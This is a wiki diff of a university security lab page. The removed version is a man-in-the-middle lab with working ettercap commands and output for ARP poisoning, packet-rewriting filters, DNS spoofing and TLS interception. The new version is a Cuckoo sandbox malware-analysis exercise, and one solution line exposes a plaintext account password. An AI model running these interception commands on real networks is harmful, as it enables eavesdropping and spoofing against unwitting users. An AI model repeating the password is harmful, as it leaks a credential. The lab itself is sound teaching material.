Differences
This shows you the differences between two versions of the page.
|
cdci:labs:4 [2024/12/03 10:42] mihai.chiroiu [01. [5p] Virtual machine setup] |
cdci:labs:4 [2025/01/21 19:24] (current) mihai.chiroiu |
||
|---|---|---|---|
| Line 1: | Line 1: | ||
| - | ====== Lab04. Man-in-the-middle attack ====== | + | ====== Lab04. Cuckoo sandboxing ====== |
| - | + | ||
| - | <note warning> | + | |
| - | Important read to be graded! | + | |
| - | {{page>:cdci:rec&nofooter&noeditbutton&noheader}} | + | |
| - | </note> | + | |
| ===== Objectives ===== | ===== Objectives ===== | ||
| - | * MITM using ettercap tool | + | * Investigate a possible malware using automatic tools |
| - | * Wireshark usage for protocol dissection - DNS | + | * Use the cuckoo sandbox automated malware analysis system |
| - | * Understanding attacks on ARP | + | * Introduction to basic Linux command line |
| - | * Learning different types of MITM | + | |
| ===== Topology ===== | ===== Topology ===== | ||
| - | {{ :cdci:labs:cdci_lab04-mitm-topology.png?direct&600 |}} | + | For this exercise you will need the [[https://drive.google.com/open?id=11WTT3NYUfVk7UopVnUc-uf9SKgvzIcOf |malware archive]]. |
| + | You will also need a Linux environment with Cuckoo sandbox installed and a running Windows VM. One can be downloaded from [[ https://drive.google.com/file/d/14-7DqZ1jNKuqxr73Wk8TcTylRl7tNKNk/view?usp=sharing | here]]. | ||
| ===== Tasks ===== | ===== Tasks ===== | ||
| - | ==== 01. [5p] Virtual machine setup ==== | + | ==== 01. [10p] Virtual machine setup ==== |
| - | First, make sure that your virtual machine is updated (run the provided update.sh script, or create one). | + | You will need to have Linux VM (we have tested with Ubuntu 20.04) and then install the [[https://cuckoo.readthedocs.io/en/latest/installation/host/installation/ | Cuckoo sandbox on top of it]]. You can access Cuckoo sandbox from a browser, and to limit the impact of the malware analysis process please do so from the same VM (i.e. install a graphical server and a browser on the Linux VM). |
| - | There is a small with starting the docker in privileged mode, so please edit this file first: | ||
| <code> | <code> | ||
| - | root@cdci:/# vim ~/cdci/containernet/mininet.py (line 828, privileged = True) | + | $startx (to start the graphical interface) |
| </code> | </code> | ||
| - | Next, in one terminal start the provided Mininet topology. | + | After the installation you need to power on the cuckoo sandbox system using the following commands. To verify that cuckoo sandboxing is running open the [[http://127.0.0.1:8000 | hxxp://127.0.0.1:8000]] into a browser. |
| <code> | <code> | ||
| - | root@cdci:/# cd cdci/lab04 | + | $cuckoo web runserver |
| - | root@cdci:/# /usr/bin/python3 topology.py | + | $cuckoo -d (!!! do not run as sudo) |
| </code> | </code> | ||
| - | If there are any problems with starting the topology (if all is good you should see the Mininet prompt ">") use the given cleanup script and try to restart the topology. | + | Next, inside your Linux VM one needs to run a second VM with Windows. This one is used by the Cuckoo framework to do the automatic malware analysis. Follow the tutorials available and make sure that the Windows VM is available. In the case of misconfigured guest VM (i.e., the Windows 7 VirtualBox VM), you can reset it to the initial configuration. [[https://cuckoo.readthedocs.io/en/latest/installation/guest/saving/|1]] |
| + | - Delete any existing snapshots. | ||
| + | - Power on the virtual machine. | ||
| + | - Create a new snapshot <code> VBoxManage snapshot "win7cuckoo" take "original" --pause </code> | ||
| + | - Power of the virtual machine <code> VBoxManage controlvm "win7cuckoo" poweroff </code> | ||
| + | - Restore the virtual machine to use the previously created snapshot. <code> VBoxManage snapshot "win7cuckoo" restorecurrent </code> | ||
| - | ==== 02. [5p] Internet connectivity ==== | + | All this setup is already done in the following VM [[https://drive.google.com/file/d/14-7DqZ1jNKuqxr73Wk8TcTylRl7tNKNk/view?usp=sharing]] |
| - | Before you begin, make sure that you have Internet connectivity on all two nodes (attacker and victim). R1 should be the gateway for the Attacker and Victim. Write down the MAC and IP addresses of all 3 nodes (including the gateway). Use the provided scripts to access the nodes. | + | ==== 02. [30p] Malware analysis ==== |
| - | <code> | + | |
| - | root@ip-172-30-0-165:/# ./attacker_bash.sh | + | |
| - | root@attacker:/# | + | |
| - | root@ip-172-30-0-165:/# ./victim_bash.sh | + | To start the malware investigation, submit the received files using the dashboard and select Analyze from the “Configure your Analysis” page. Please configure a 500 seconds Timeout to allow enough time for execution and make sure that the package type is “exe” from the left-side panel for a proper lunch. |
| - | root@victim:/# | + | |
| - | </code> | + | |
| - | ==== 03. [30p] ARP poisoning MITM attack ==== | + | * Once the process has started, you should be able to see the progress in the terminal where the cuckoo daemon was lunched. Moreover, the Windows 7 pre-configured virtual machine should be started, and the malware launched. |
| + | {{ :cdci:labs:cdci_lab02_cuckoo-sandbox-vm.jpg?direct&600 |}} | ||
| + | * Observe that the python agent within the Windows 7 has launched the malware and is monitoring it. You should also be able to see the random mouse movements. Why is this happening? | ||
| - | The goal of this exercise is to pass all the victim's traffic through the attacker's machine. From the Attacker node start an ARP poisoning mitm attack against the Victim machine using ettercap tool. Use “ping” tool from Victim and make sure that all traffic (including to outside) goes through the Attacker’s node (use extra verbose option for ettercap). | + | ==== 03. [20p] Report overview ==== |
| - | <note tip> | + | After the report has been generated, you should be able to answer the following questions. |
| - | Make sure that you enable remote sniffing. To exit ettercap simply press Q. | + | |
| - | </note> | + | |
| - | Use tcpdump to save all the traffic from the victim and analyze it using Wireshark. Try to answer the following questions: | + | - What is the executable file format? What is the Original Filename of the executable? |
| - | * Can you spot the Gratuitous ARP packet sent when infecting the victim? | + | - What is the hash (preferable SHA2 family) of the malware? Can you find it on [[http://www.virustotal.com | hxxp://www.virustotal.com]]? |
| - | * Look into the layer 2 of the packets and see how the destination MAC address has changed under the attack. | + | - What command is executed to allow access to all files? |
| - | * Can you spot the Gratuitous ARP packet when the infection is stopped? | + | - Which DNS records are recorded during the analysis? |
| + | - What registry entries does the malware add? | ||
| - | <solution> | + | ==== 04. [30p] More result analysis ==== |
| - | <code> | + | |
| - | root@attacker:/# ettercap -E -T -M ARP:remote /192.168.16.100// /192.168.16.1// | + | |
| - | ettercap 0.8.3 copyright 2001-2019 Ettercap Development Team | + | All the monitored actions are stored by Cuckoo in the “.cuckoo” configuration folder under the storage directory. |
| + | * Find in what languages is the support message from the malware available. | ||
| + | * Which files were encrypted during the process? | ||
| + | * Have a look at the captured traffic using Wireshark. | ||
| - | Listening on: | + | ==== 05. [10p] Custom rules for automated analysis ==== |
| - | attacker-eth0 -> FE:14:85:E7:5F:D0 | + | |
| - | 192.168.16.2/255.255.255.0 | + | |
| - | * |==================================================>| 100.00 % | + | |
| - | [...] | + | |
| - | Sat Mar 14 20:39:26 2020 [835705] | + | Cuckoo sandbox has a lot of extra tools that it can use for deeper analysis, including snort IDS, IDA for binary or Yara for signature matching. The Yara rules can be run against the binary itself, against the memory dump or accessed URLs. In this exercise we are going to use the Yara rules available on the following github [[https://github.com/Yara-Rules/rules/blob/master/malware/RANSOM_MS17-010_Wannacrypt.yar | repository]]. Just copy them in the yara configuration directory and re-run the analysis. |
| - | D2:5D:2C:AD:D4:F5 --> FE:14:85:E7:5F:D0 | + | |
| - | 192.168.16.100:0 --> 8.8.8.8:0 | P (0) | + | |
| - | + | ||
| - | + | ||
| - | root@attacker:/# tcpdump -n -i Attacker-eth0 -w mitm.pcap | + | |
| - | </code> | + | |
| - | </solution> | + | |
| - | ==== 04. [10p] Traffic dissection ==== | + | ==== 06. [Bonus 10p] Custom rules for automated analysis ==== |
| - | Investigate the following traffic as it is generated by the Victim node: | + | Redo the analysis using the https://any.run/ platform. |
| - | * HTTP and DNS while under MITM attack. Can you use Wireshark and rebuild/export the HTML pages that the victim opened (use wget or curl)?. | + | |
| - | + | ||
| - | <note tip> | + | |
| - | Transfer the pcap file to your local computer and open it in wireshark. Then select File->Export HTML Objects. | + | |
| - | </note> | + | |
| - | + | ||
| - | ==== 05. [20p] Raw packets altering ==== | + | |
| - | + | ||
| - | Ettercap filters can also be used to modify packets as they pass through the attacker’s node. Use the provided filter to change icmp type from echo to reply (Hint: [[https://www.iana.org/assignments/icmp-parameters/icmp-parameters.xhtml]]). | + | |
| - | * You should observe the changes on the victim (no more replies). | + | |
| - | * Use tcpdump on the attacker to inspect the changes. | + | |
| - | + | ||
| - | <note tip> | + | |
| - | [[https://linux.die.net/man/8/etterfilter]] | + | |
| - | </note> | + | |
| - | + | ||
| - | <code> | + | |
| - | cat icmp.filter | + | |
| - | if (ip.proto == ICMP) { | + | |
| - | msg("Changing ICMP type!\n"); | + | |
| - | replace("8.8.8.8", "8.8.4.4"); | + | |
| - | } | + | |
| - | etterfilter icmp.filter -o icmp.ef | + | |
| - | </code> | + | |
| <solution> | <solution> | ||
| - | <code> | + | For any.run use the student.cdci@totococo.fr.nf / "2YGt@pS5TtqUEkS" account |
| - | cat icmp.filter | + | |
| - | if (ip.proto == ICMP && icmp.type == 0) { | + | |
| - | msg("Changing address!\n"); | + | |
| - | icmp.type = 8; | + | |
| - | } | + | |
| - | etterfilter icmp.filter -o icmp.ef | + | |
| - | ettercap -T -F icmp.ef -M ARP:remote /192.168.16.100// /192.168.16.1// | + | |
| - | </code> | + | |
| - | </solution> | + | |
| - | + | ||
| - | + | ||
| - | + | ||
| - | ==== 06. [10p] DNS traffic altering ==== | + | |
| - | + | ||
| - | Another interesting plugin of Ettercap is DNS spoofing. Config it such that any queries for the “facebook.com” domain name are translated into “127.0.0.1”. | + | |
| - | + | ||
| - | <note tip> | + | |
| - | [[https://linux.die.net/man/8/ettercap_plugins]] | + | |
| - | </note> | + | |
| - | + | ||
| - | <solution> | + | |
| - | <code> | + | |
| - | root@attacker:~# cat /etc/ettercap/etter.dns | + | |
| - | www.facebook.com A 127.0.0.1 | + | |
| - | root@attacker:/# ettercap -P dns_spoof -E -T -M ARP:remote /192.168.16.100// /192.168.16.1// | + | |
| - | + | ||
| - | Listening on: | + | |
| - | attacker-eth0 -> 1E:D4:8A:37:43:CD | + | |
| - | 192.168.16.2/255.255.255.0 | + | |
| - | * |==================================================>| 100.00 % | + | |
| - | Activating dns_spoof plugin... | + | |
| - | + | ||
| - | Sat Mar 14 21:22:44 2020 [161164] | + | |
| - | CE:82:B8:0E:6B:72 --> 1E:D4:8A:37:43:CD | + | |
| - | UDP 192.168.16.100:48445 --> 172.30.0.2:53 | (34) | + | |
| - | A............www.facebook.com.....dns_spoof: A [www.facebook.com] spoofed to [127.0.0.1] TTL [3600 s] | + | |
| - | + | ||
| - | + | ||
| - | root@victim:/# nslookup www.facebook.com | + | |
| - | Non-authoritative answer: | + | |
| - | www.facebook.com canonical name = star-mini.c10r.facebook.com. | + | |
| - | Name: star-mini.c10r.facebook.com | + | |
| - | Address: 157.240.221.35 | + | |
| - | [...] | + | |
| - | root@victim:/# nslookup www.facebook.com | + | |
| - | Name: www.facebook.com | + | |
| - | Address: 127.0.0.1 | + | |
| - | </code> | + | |
| - | </solution> | + | |
| - | ==== 07. [20p] HTTPS traffic inspection ==== | + | |
| - | + | ||
| - | Unfortunately, HTTPS traffic cannot be inspected, or can it :). We will try to use ettercap and observe changes in the certificate chain when MITM attack is active. | + | |
| - | * First, use the “openssl s_client” tool (or other) to see the certificates path for the “www.google.com” website. <code> root@victim:~# openssl s_client -showcerts www.google.com:443 | + | |
| - | CONNECTED(00000005) | + | |
| - | depth=2 OU = GlobalSign Root CA - R2, O = GlobalSign, CN = GlobalSign | + | |
| - | verify return:1 | + | |
| - | depth=1 C = US, O = Google Trust Services, CN = GTS CA 1O1 | + | |
| - | verify return:1 | + | |
| - | depth=0 C = US, ST = California, L = Mountain View, O = Google LLC, CN = www.google.com | + | |
| - | verify return:1 | + | |
| - | </code> | + | |
| - | * Next, run ettercap without TLS MITM (-S). | + | |
| - | * Now, run ettercap including TLS MITM. | + | |
| - | + | ||
| - | <note tip> | + | |
| - | For the TLS MITM you will require a certificate and a private key to be used when running ettercap (hint: [[https://manpages.debian.org/jessie/ettercap-common/ettercap.8.en.html|--certificate]]). Use the following code to create the private key and certificate. | + | |
| - | <code> | + | |
| - | root@attacker:~# openssl genrsa -out hacker.pem 2048 | + | |
| - | root@attacker:~# openssl req -x509 -new -key hacker.pem -sha256 -days 365 -out hacker.crt | + | |
| - | </code> | + | |
| - | </note> | + | |
| - | + | ||
| - | <note tip> | + | |
| - | For the MITM TLS attack we have to allow ettercap to run as root user and enable iptables configurations. This is required to allow ettercap SSL filter to receive and decode the TLS traffic. Modify the configuration file, “/etc/ettercap/etter.conf”, with the following. | + | |
| - | <code> | + | |
| - | ec_uid = 0 | + | |
| - | ec_gid = 0 | + | |
| - | # if you use iptables: | + | |
| - | redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport" | + | |
| - | redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport" | + | |
| - | redir6_command_on = "ip6tables -t nat -A PREROUTING -i %iface -p tcp -s %source -d %destination --dport %port -j REDIRECT --to-port %rport" | + | |
| - | redir6_command_off = "ip6tables -t nat -D PREROUTING -i %iface -p tcp -s %source -d %destination --dport %port -j REDIRECT --to-port %rport" | + | |
| - | </code> | + | |
| - | </note> | + | |
| - | + | ||
| - | <solution> | + | |
| - | <code> | + | |
| - | root@attacker:~# ettercap -E -T -M ARP:remote --private-key hacker.pem --certificate hacker.crt /192.168.16.100// /192.168.16.1// | + | |
| - | + | ||
| - | + | ||
| - | root@victim:~# openssl s_client -showcerts www.google.com:443 | + | |
| - | CONNECTED(00000005) | + | |
| - | depth=0 C = AU, ST = Some-State, O = Internet Widgits Pty Ltd | + | |
| - | verify error:num=18:self signed certificate | + | |
| - | verify return:1 | + | |
| - | depth=0 C = AU, ST = Some-State, O = Internet Widgits Pty Ltd | + | |
| - | verify return:1 | + | |
| - | --- | + | |
| - | </code> | + | |
| </solution> | </solution> | ||
